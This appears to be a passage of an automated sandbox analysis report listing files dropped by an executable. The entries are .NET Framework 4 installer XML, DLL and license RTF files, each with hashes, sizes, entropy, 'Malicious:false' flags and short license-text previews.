                                                            SHA-256:204021CC428C70F76DE750C0B01404E3396EE8602C8F25F44635F6F2BDBF693A
                                                            SHA-512:88E44178770025B960BF2329901B6BEC90115B62D9F44A43FD914AEF687C2FCE7E370D9BA8CAAF9BF930553EB99580C47F8E7FDC0C32FE9A921DD368BF8E4658
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (682), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):82346
                                                            Entropy (8bit):3.5798945100215325
                                                            Encrypted:false
                                                            SSDEEP:1536:guayUbZwf+2CzQHsjz1VbxzPGnz6solo8xKc6JT/1Sy:JayUtwf+2CzQHshPGnz6solo8xKc6JTd
                                                            MD5:8505219C0A8D950FF07DC699D8208309
                                                            SHA1:7A557356C57F1FA6D689EA4C411E727438AC46DF
                                                            SHA-256:C48986CDB7FE3401234E0A6540EB394C1201846B5BEB1F12F83DC6E14674873A
                                                            SHA-512:7BCDAD0CB4B478068434F4EBD554474B69562DC83DF9A423B54C1701CA3B43C3B92DE09EE195A86C0D244AA5EF96C77B1A08E73F1F2918C8AC7019F8DF27B419
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.135663555520085
                                                            Encrypted:false
                                                            SSDEEP:384:lQ16m3rhGrcHN/USYvYVA9WKieW8bLXci2jXHU2Ze:lEhCSVYvYVAA+Mi2jXHU2A
                                                            MD5:7C9AE49B3A400C728A55DD1CACC8FFB2
                                                            SHA1:DD3A370F541010AD650F4F6AA42E0CFC68A00E66
                                                            SHA-256:402C796FEBCD78ACE8F1C5975E39193CFF77F891CFF4D32F463F9A9C83806D4A
                                                            SHA-512:D30FE9F78A49C533BE5C00D88B8C2E66A8DFAC6D1EAE94A230CD937F0893F6D4A0EECE59C1D2C3C8126FFA9A9648EC55A94E248CD8C7F9677F45C231F84F221B
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3419
                                                            Entropy (8bit):5.19064562442276
                                                            Encrypted:false
                                                            SSDEEP:96:MWBfVBITvyTqDyiRc3E5Zob0MpDmqgH4KYXsY/49Uo2:VffWX5Zm0O3Q32
                                                            MD5:94190970FB79C7085DE2E97AE4630B07
                                                            SHA1:272677F49985098CA0477D6A8C1E70E4BDDB646C
                                                            SHA-256:A448FE5954EC68B7C395DA387545C1664C3F4BAADE021E6157EC142997D93CA2
                                                            SHA-512:7A7EE485D20912FC533E83EAE0F151DC142C2F01051735D1F9B20A7146154A04C8269FC9F71AC82E57925B566E07E716CDED6DB8B11026225CEAAC209311531F
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (708), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):86284
                                                            Entropy (8bit):4.3740758325121645
                                                            Encrypted:false
                                                            SSDEEP:384:4w+7UVysuXHXeXAehlT++sTGoheXrW4MgcyvF773/xSFVQbleaS8tOnjiJLtchH0:+3OQeHll5PunjiJr
                                                            MD5:3BF8DA35B14FBCC564E03F6342BB71F2
                                                            SHA1:8F9139F0BB813BF95F8C437548738D32848D8940
                                                            SHA-256:39EFE12C689EDFEA041613B0E4D6EC78AFEC8FE38A0E4ADC656591FFEF8F415D
                                                            SHA-512:31B050647BA4BD0C2762D77307E1ED2A324E9B152C06ED496B86EA063CDC18BF2BB1F08D2E9B4AF3429A2BC333D7891338D7535487C83495304A5F78776DBC03
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):19288
                                                            Entropy (8bit):5.607263971475317
                                                            Encrypted:false
                                                            SSDEEP:384:jwB6VfhGGglsETXrI7k1tcVlUHe3YRPWTBZWwLXci2jXHUQ:jlpGGKQVlhsSLMi2jXHUQ
                                                            MD5:E663B67A66ADF9375D1D183CA5FDD23D
                                                            SHA1:30360546A00FFF0A7C2B47F4B01C89E771F13971
                                                            SHA-256:574FBDEDCDA1F9F34C997AC3F192CBA72A67D6534B2E9AB80A35AB3543621D58
                                                            SHA-512:46E7FFB4889A43059665893ABF1D2B6BF3430A617023FFA91F54AF6D5062444B844D8811ED2D037E756993F733986479E93784AC25C553F70F1CF8D1B67182A3
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):8876
                                                            Entropy (8bit):4.086204739568071
                                                            Encrypted:false
                                                            SSDEEP:192:/foOHY6P6Km5NHMQaEjxPSuHON0SuQI62:R46Pm5Ns0jxpeuQV2
                                                            MD5:2091F5DA2BF884F747103A31D2DC947B
                                                            SHA1:AAD26EB74B793D7DE2F466150F609C276D398FB5
                                                            SHA-256:B7A7F2388600D9D059DCDF300845938E429A0FF16EB03BDECE48825805069B7E
                                                            SHA-512:AE798ACD11E9A4ADD33DA760B46200E24B9F9403BBBFAF6CB45E25193D346BDE3B91C9B79BB7E10E529DEDD824A89D23212745CF9E9E5EBB44319E9DD812C61D
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (657), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77232
                                                            Entropy (8bit):3.5669629909438734
                                                            Encrypted:false
                                                            SSDEEP:384:4w6JjgKW5D8U2JhrDheHQTBNgNSdfUGNatvcc7QDBuGdSJgkR6Sqzxu:gJsKKIrDPT7lSJYI
                                                            MD5:326518603D85ACD79A6258886FC85456
                                                            SHA1:F1CEF14BC4671A132225D22A1385936AD9505348
                                                            SHA-256:665797C7840B86379019E5A46227F888FA1A36A593EA41F9170EF018C337B577
                                                            SHA-512:F8A514EFD70E81D0F2F983282D69040BCA6E42F29AA5DF554E6874922A61F112E311AD5D2B719B6CA90012F69965447FB91E8CD4103EFB2453FF160A9062E5D3
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".T.h.e. .s.e.t.u.p. .c.a.n.n.o.t. .r.u.n. .i.n. .c.o.m.p.a.t.i.b.i.l.i.t.y. .m.o.d.e... .F.o.r. .m.o.r.e. .i.n.f.o.r.m.a.t.i.o.n.,. .s.e.e. .t.h.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.R.e.a.d.m.e. .f.i.l.e.&.l.t.;./.A.&.g.t.;...". ./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17240
                                                            Entropy (8bit):5.151474565875158
                                                            Encrypted:false
                                                            SSDEEP:192:byk5nUfwTW7JwWp0eW6jp8M+9HS8bC/TJs7kFkzQKPnEtObMacxc8hjeyveCXZBe:pgoTWp0eWB9ygC/TfFkzLXci2jpv8
                                                            MD5:9547D24AC04B4D0D1DBF84F74F54FAF7
                                                            SHA1:71AF6001C931C3DE7C98DDC337D89AB133FE48BB
                                                            SHA-256:36D0159ED1A7D88000737E920375868765C0A1DD6F5A5ACBB79CF7D97D9E7A34
                                                            SHA-512:8B6048F4185A711567679E2DE4789407077CE5BFE72102D3CB1F23051B8D3E6BFD5886C801D85B4E62F467DD12DA1C79026A4BC20B17F54C693B2F24E499D40F
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3188
                                                            Entropy (8bit):5.285087573798006
                                                            Encrypted:false
                                                            SSDEEP:96:MHfTLNnTkWBTkFDZ8f4wHlre7MUxprfKmMb0+MW+1Ep9qeelN+sznM+IEp+Lk2:yfyTLillHW+mMhyAspz2
                                                            MD5:B7129C4881F118FCB38F27CFB00CD36D
                                                            SHA1:148989B710205C6A67B3F960567F6DAA98D75BDA
                                                            SHA-256:DA3D6A6AC223744DF01C920EAE5F43E017F52350831C4F3F6BB38D78232EA3B4
                                                            SHA-512:C0816D7676DDF0774EB9022BD305CDCDFEF590BE38E20C2D5584968BCA78E10A14BE375FA892593F11D04BE2734A30B5C1D21814B88C31814C713E08546436E7
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\froman\fprq2\fcharset0 Times New Roman;}{\f1\fswiss\fprq2\fcharset0 Tahoma;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;\red255\green0\blue0;\red0\green0\blue128;}..{\*\generator Msftedit 5.41.21.2508;}\viewkind4\uc1\pard\sb120\sa120\f0\fs20\par..\b\f1\fs28 MICROSOFT SOFTWARE SUPPLEMENTAL LICENSE TERMS\par..\fs22 MICROSOFT .NET FRAMEWORK 4 FOR MICROSOFT WINDOWS OPERATING SYSTEM \f0\par..\f1 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE FOR MICROSOFT WINDOWS OPERATING SYSTEM \f0\par..\pard\brdrb\brdrs\brdrw10\brsp20 \sb120\sa120\f1 AND ASSOCIATED LANGUAGE PACKS\b0\f0\par..\pard\sb120\sa120\f1\fs20 Microsoft Corporation (or based on where you live, one of its affiliates) licenses this supplement to you. If you are licensed to use Microsoft Windows operating system software (for which this supplement is applicable) (the \ldblquote software\rdblquote ), you may use this supplement. You may
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (597), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77022
                                                            Entropy (8bit):3.5745326569682434
                                                            Encrypted:false
                                                            SSDEEP:1536:wT42CX8ugmmuM92kEMeeGOCOUJPePJiWGICG+JND:wT42CX8ugmmuM92kEMeeGOCOUJPePJi/
                                                            MD5:1AA252256C895B806E4E55F3EA8D5FFB
                                                            SHA1:0322EE94C3D5EA26418A2FEA3F7E62EC5D04B81D
                                                            SHA-256:8A68B3B6522C30502202ECB8D16AE160856947254461AC845B39451A3F2DB35F
                                                            SHA-512:CE57784892C0BE55A00CED0ADC594A534D8A40819790CA483A29B6CD544C7A75AE4E9BDE9B6DC6DE489CECEB7883B7C2EA0E98A38FCC96D511157D61C8AA3E63
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".A.s.e.n.n.u.s.o.h.j.e.l.m.a.a. .e.i. .v.o.i. .s.u.o.r.i.t.t.a.a. .y.h.t.e.e.n.s.o.p.i.v.u.u.s.t.i.l.a.s.s.a... .L.i.s...t.i.e.t.o.j.a. .o.n. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.L.u.e. .m.i.n.u.t. .-.t.i.e.d.o.s.t.o.s.s.a.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.166182954405893
                                                            Encrypted:false
                                                            SSDEEP:192:rJkinUfwVWVRdufl0fXA1Z1j93S0WHpdcIirs442QXWMkeWEQKPnEtObMacxc8hg:rO16Lwz51JWMkeWELXci2jpvi
                                                            MD5:881ADF55D51976CA592033A7ADF620B8
                                                            SHA1:E82ED85E25411610D1F977A99368A7A6547C7C47
                                                            SHA-256:88FCE9BFC0458E375811A7F1EA7CB9777E241D373EEF15D4B23835F77979D54C
                                                            SHA-512:FED744A6E37F18B6CC3708EEB9F3E874269B1CBDB63B54284470E39E2B01D3DFB61F3626E34638231B9034FA699BDCCD7FE623D8478B205723EF45C1AA595FF9
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3702
                                                            Entropy (8bit):5.238529406475761
                                                            Encrypted:false
                                                            SSDEEP:96:MWBfuMAh8TZhqTy9DbDixX7zR7MrrqX37ILY7TpLgoyk1zERRe5g9KIMpDnYA06m:VfeRzH3vmLQzE6AOAC2
                                                            MD5:4A43D21D1576E040DC9F5B90162A0401
                                                            SHA1:1616FA39D9E4E7B2BB927CADED944DD14BD05656
                                                            SHA-256:F0E2739892A1CE8A6445CEC72FF9AD88E939E21C719552E8ACD746F92F9FAFB7
                                                            SHA-512:7A7C50B7EC09282A828B06C6A52340C1CAEFF0CFA01FF81375483045972D3645092B5B385103C19ACCADBE5B758DFF85A9DC6FDC00F9AF32AEE076E2C49F79BA
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1041{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1035\b\f0\fs20 MICROSOFT-OHJELMISTON T\'c4YDENNYSOSAN K\'c4YTT\'d6OIKEUSSOPIMUKSEN EHDOT\lang1033\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\lang1035\f0 MICROSOFT .NET FRAMEWORK 4 MICROSOFT WINDOWS -K\'c4YTT\'d6J\'c4RJESTELM\'c4\'c4N\lang1033\f1\par..\lang1035\f0 MICROSOFT .NET FRAMEWORK 4 CLIENT PROFILE MICROSOFT WINDOWS -K\'c4YTT\'d6J\'c4RJESTELM\'c4\'c4N\par..\lang1033 SEK\'c4 NIIHIN LIITTYV\'c4T KIELIPAKETIT\par..\pard\nowidctlpar\sb120\sa120\lang1035\b0 Microsoft Corporation (tai asiakkaan asuinpaikan mukaan m\'e4\'e4r\'e4ytyv\'e4 Microsoft Corporationin konserniyhti\'f6) my\'f6nt\'e4\'e4 asiakkaalle t\'e4m\'e4n t\'e4ydennysosan k\'e4ytt\'f6oikeudet.\la
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (666), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):82962
                                                            Entropy (8bit):3.5891850903091727
                                                            Encrypted:false
                                                            SSDEEP:384:4wCFpNvOvt1jagJVzRzchryjiTIJz0kbG52bxVv:WvotpaluaIJzaIv
                                                            MD5:1DAD88FAED661DB34EEF535D36563EE2
                                                            SHA1:0525B2F97EDDBD26325FDDC561BF8A0CDA3B0497
                                                            SHA-256:9605468D426BCBBE00165339D84804E5EB2547BFE437D640320B7BFEF0B399B6
                                                            SHA-512:CCD0BFFBF0538152CCCD4B081C15079716A5FF9AD04CEE8679B7F721441F89EB7C6F8004CFF7E1DDE9188F5201F573000D0C078474EDF124CFA4C619E692D6BC
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=.".L.e. .p.r.o.g.r.a.m.m.e. .d.'.i.n.s.t.a.l.l.a.t.i.o.n. .n.e. .p.e.u.t. .p.a.s. .s.'.e.x...c.u.t.e.r. .e.n. .m.o.d.e. .d.e. .c.o.m.p.a.t.i.b.i.l.i.t..... .P.o.u.r. .p.l.u.s. .d.'.i.n.f.o.r.m.a.t.i.o.n.s.,. .c.o.n.s.u.l.t.e.z. .l.e. .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;.f.i.c.h.i.e.r. .r.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18776
                                                            Entropy (8bit):5.112489568342605
                                                            Encrypted:false
                                                            SSDEEP:384:J7Z66AY9li3OoDDkbiWpQeWELXci2jpv8:JffiZDgycMi2jpv8
                                                            MD5:93F57216FE49E7E2A75844EDFCCC2E09
                                                            SHA1:DCCD52787F147E9581D303A444C8EE134AFC61A8
                                                            SHA-256:2506827219B461B7C6C862DAE29C8BFF8CB7F4A6C28D2FF60724CAC70903987D
                                                            SHA-512:EADFFB534C5447C24B50C7DEFA5902F9EB2DCC4CF9AF8F43FA889B3367EA25DFA6EA87FF89C59F1B7BBF7106888F05C7134718021B44337AE5B7D1F808303BB1
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3526
                                                            Entropy (8bit):5.107243175407303
                                                            Encrypted:false
                                                            SSDEEP:96:MTBfEhmvTf8vTR/DSIem21HDpHD1cT+Tot4er42xzK8/ptMpDLaFNsNGlDPsCU2:IfJw95eJlx1E+Tot4er42xzKuOKPU2
                                                            MD5:E0DA85DB8B02A89A63601EA6B9AD7FF8
                                                            SHA1:5F91C397CF3FBF4475FF71339B2D69C45694130F
                                                            SHA-256:8880B979A4F8ECDD529241D9AE02583FECD21010EA1E255A1CBCD0C6FB2F75E9
                                                            SHA-512:C8F47154145507C89D9B599D725C3444A206AE2AFAC2ACA4B2EA18980DEC134A25FC539CE1FB2291AF942DC1CA25EE2FFF323FB17F43F5BF91157A30B19BCD17
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang1033\deflangfe1033{\fonttbl{\f0\fswiss\fprq2\fcharset0 Tahoma;}{\f1\froman\fprq2\fcharset0 Times New Roman;}{\f2\fswiss\fprq2\fcharset0 Trebuchet MS;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Msftedit 5.41.21.2509;}\viewkind4\uc1\pard\nowidctlpar\sb120\sa120\lang1036\b\f0\fs20 TERMES DE CONTRAT DE LICENCE D\rquote UN SUPPL\'c9MENT MICROSOFT\f1\par..\pard\brdrb\brdrs\brdrw10\brsp20 \nowidctlpar\sb120\sa120\f0 MICROSOFT .NET FRAMEWORK\~4 POUR LE SYST\'c8ME D\rquote EXPLOITATION MICROSOFT WINDOWS\f1\par..\f0 MICROSOFT .NET FRAMEWORK\~4 CLIENT PROFILE POUR LE SYST\'c8ME D\rquote EXPLOITATION MICROSOFT WINDOWS\par..ET LES LANGAGE PACKS ASSOCI\'c9S\par..\pard\nowidctlpar\sb120\sa120\b0 Microsoft Corporation (ou, en fonction du lieu o\'f9 vous vivez, l\rquote un de ses affili\'e9s) vous accorde une licence pour ce suppl\'e9ment.\b \b0 Si vous \'eates titulaire d\rquote une licence d\rquote utilisation du logiciel de syst\'e8me d\rquote exploita
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (599), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):72076
                                                            Entropy (8bit):4.190903034087703
                                                            Encrypted:false
                                                            SSDEEP:384:4wkvJlqaYsxaAzdNhXdQGKbvvGu1kZJNvSX33qLv:OHqaBxaeJN7T
                                                            MD5:16E6416756C1829238EF1814EBF48AD6
                                                            SHA1:C9236906317B3D806F419B7A98598DD21E27AD64
                                                            SHA-256:C0EE256567EA26BBD646F019A1D12F3ECED20B992718976514AFA757ADF15DEA
                                                            SHA-512:AA595ED0B3B1DB280F94B29FA0CB9DB25441A1EF54355ABF760B6B837E8CE8E035537738E666D27DD2A8D295D7517C325A5684E16304887CCB17313CA4290CE6
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.".>..... . .<.L.o.c.a.l.i.z.e.d.D.a.t.a.>..... . . . .<.L.a.n.g.u.a.g.e.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.i.n._.O.S._.C.o.m.p.a.t.i.b.i.l.i.t.y._.M.o.d.e.).". .L.o.c.a.l.i.z.e.d.T.e.x.t.=."............... ............. ....... ............. ........... ......... ............... ........... ......... .........,. ....... .&.l.t.;.A. .H.R.E.F.=.&.q.u.o.t.;.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.?.L.i.n.k.I.d.=.1.6.4.1.5.6.&.q.u.o.t.;.&.g.t.;......... .R.e.a.d.m.e.&.l.t.;./.A.&.g.t.;..."./.>..... . . . . . .<.T.e.x.t. .I.D.=.".#.(.l.o.c...B.l.o.c.k.e.r._.U.n.i.n.s.t.a.l.l.W.a.r.n.i.n.g.).". .L.o.c.a.l.i.z.e.d.T.e.x.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):16728
                                                            Entropy (8bit):5.741920618836553
                                                            Encrypted:false
                                                            SSDEEP:192:KADkdHUfwVW13jowXiTeISvjpHawC1wWmeW8QKPnEtObMacxc8hjeyveCX1HQ:K506Qrw5wWmeW8LXci2jpvfw
                                                            MD5:06CC83E6C677DB13757DF4242F5679F7
                                                            SHA1:493D44DA1C36A5CEC83B0420BEBC2BF76A9262E8
                                                            SHA-256:8E3C9332AB38DAD95A4293C466EAB88B17DEE82C87BE047839E85BB816B6146E
                                                            SHA-512:D4E1694AFE2A35A7A2DB3C8B2A4F83A536DE0AFC5871AE44591317B5B6489B3911F7AEDE8AD9584DCB0BAA8D84B65A20393D587D6F993035FA7DFE13AEAF10CF
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%, Browse
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1255, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):6851
                                                            Entropy (8bit):4.46966326918659
                                                            Encrypted:false
                                                            SSDEEP:96:2Rf64JJR1vTJ3R1vTJZZDg1YGZmF1plypIuw75TYgnMJ9nqIQ2fPMpicPtxScRtZ:0fXRskPWIHxYnJVPOxScl9ZnlfZ4LH2
                                                            MD5:74C015D4E8024F9A49CF8D183CBDB0F5
                                                            SHA1:8428260A9E522A712EFC8740AF848BD7521DEB8E
                                                            SHA-256:D7718CF8F97F78656AA8964721757EA7E369FC7BBB052777C90E63D07C7CC7C5
                                                            SHA-512:BB8748054F194450BC0383D4E88600F00E01BA8FD182C3C3A5A09CFBB0C2FBC30B9CECBAD0B99DDA1EEFA5C3EB56AD50CCACF3FE39302842F16A17082F5F8D04
                                                            Malicious:false
